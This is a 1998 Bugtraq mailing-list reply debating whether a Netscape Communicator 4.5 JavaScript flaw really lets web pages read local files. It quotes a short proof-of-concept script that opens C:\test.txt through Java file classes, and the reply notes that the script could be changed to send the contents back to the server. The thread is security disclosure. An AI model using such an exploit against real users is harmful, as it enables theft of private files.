[8627] in bugtraq
Re: Netscape Communicator 4.5 can read local files
daemon@ATHENA.MIT.EDU (Andrew McNaughton)
Tue Nov 24 23:31:48 1998
Date: Wed, 25 Nov 1998 17:19:41 +1300
Reply-To: andrew@squiz.co.nz
From: Andrew McNaughton <andrew@SQUIZ.CO.NZ>
X-To: Bill Lavalette <BillL@METAINFO.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <c=US%a=_%p=MetaInfo%l=LEGO-981123193152Z-8150@lego.metainfo.com>
The demonstration exploit puts your file on screen, but could as easily
have passed it back to the server the JavaScript came from. Simply
replace alert(b) with appropriate code.
Andrew McNaughton
On Mon, 23 Nov 1998, Bill Lavalette wrote:
> Hi -
> This appears to be no different than typing c:\ in the location of any
> browser, hardly a security hole in my opinion. The test site did not
> prove that this is a potential or current problem.
>
> >The Javascript code is:
> >
> >sl=window.open("wysiwyg://1/file:///C|/");
> >sl2=sl.window.open();
> >sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your
> >file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new
> >java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) &&
> >(i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'";